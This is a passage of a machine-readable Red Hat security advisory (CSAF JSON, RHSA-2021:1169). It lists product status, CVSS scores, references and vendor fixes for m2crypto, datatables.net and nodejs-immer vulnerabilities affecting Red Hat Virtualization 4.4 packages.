"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-25657"
},
{
"category": "external",
"summary": "RHBZ#1889823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1889823"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-25657",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25657"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-25657",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25657"
}
],
"release_date": "2020-11-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "m2crypto: bleichenbacher timing attacks in the RSA decryption API"
},
{
"cve": "CVE-2020-28458",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2020-12-16T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1908441"
}
],
"notes": [
{
"category": "description",
"text": "All versions of package datatables.net are vulnerable to Prototype Pollution due to an incomplete fix for https://snyk.io/vuln/SNYK-JS-DATATABLESNET-598806.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "datatables.net: prototype pollution if \u0027constructor\u0027 were used in a data property name",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift console container does package a vulnerable version of datatables.net, however as access to the vulnerable component is restricted via OpenShift OAuth the vulnerability is rated with an impact of `Low`.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-28458"
},
{
"category": "external",
"summary": "RHBZ#1908441",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908441"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-28458",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28458"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28458",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28458"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JS-DATATABLESNET-1016402",
"url": "https://snyk.io/vuln/SNYK-JS-DATATABLESNET-1016402"
}
],
"release_date": "2020-10-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "datatables.net: prototype pollution if \u0027constructor\u0027 were used in a data property name"
},
{
"cve": "CVE-2020-28477",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2021-01-20T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1918162"
}
],
"notes": [
{
"category": "description",
"text": "This affects all versions of package immer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nodejs-immer: prototype pollution may lead to DoS or remote code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Virtualization includes affected version of nodejs-immer, however the usage does not meet the conditions required to exploit the flaw, therefore the impact is Low.\n\nIn OpenShift Container Platform 4.6 (OCP) the openshift4/ose-prometheus container ships the vulnerable version of the nodejs-immer, however the Prometheus react-ui is disabled, hence this flaw cannot be exploited. As openshift4/ose-prometheus container still packages the vulnerable code, this component is affected with impact Low. This may be fixed in a future release.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-28477"
},
{
"category": "external",
"summary": "RHBZ#1918162",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1918162"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-28477",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28477"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28477",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28477"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369",
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
}
],
"release_date": "2021-01-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "nodejs-immer: prototype pollution may lead to DoS or remote code execution"
}
]
}
rhsa-2021:1169
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
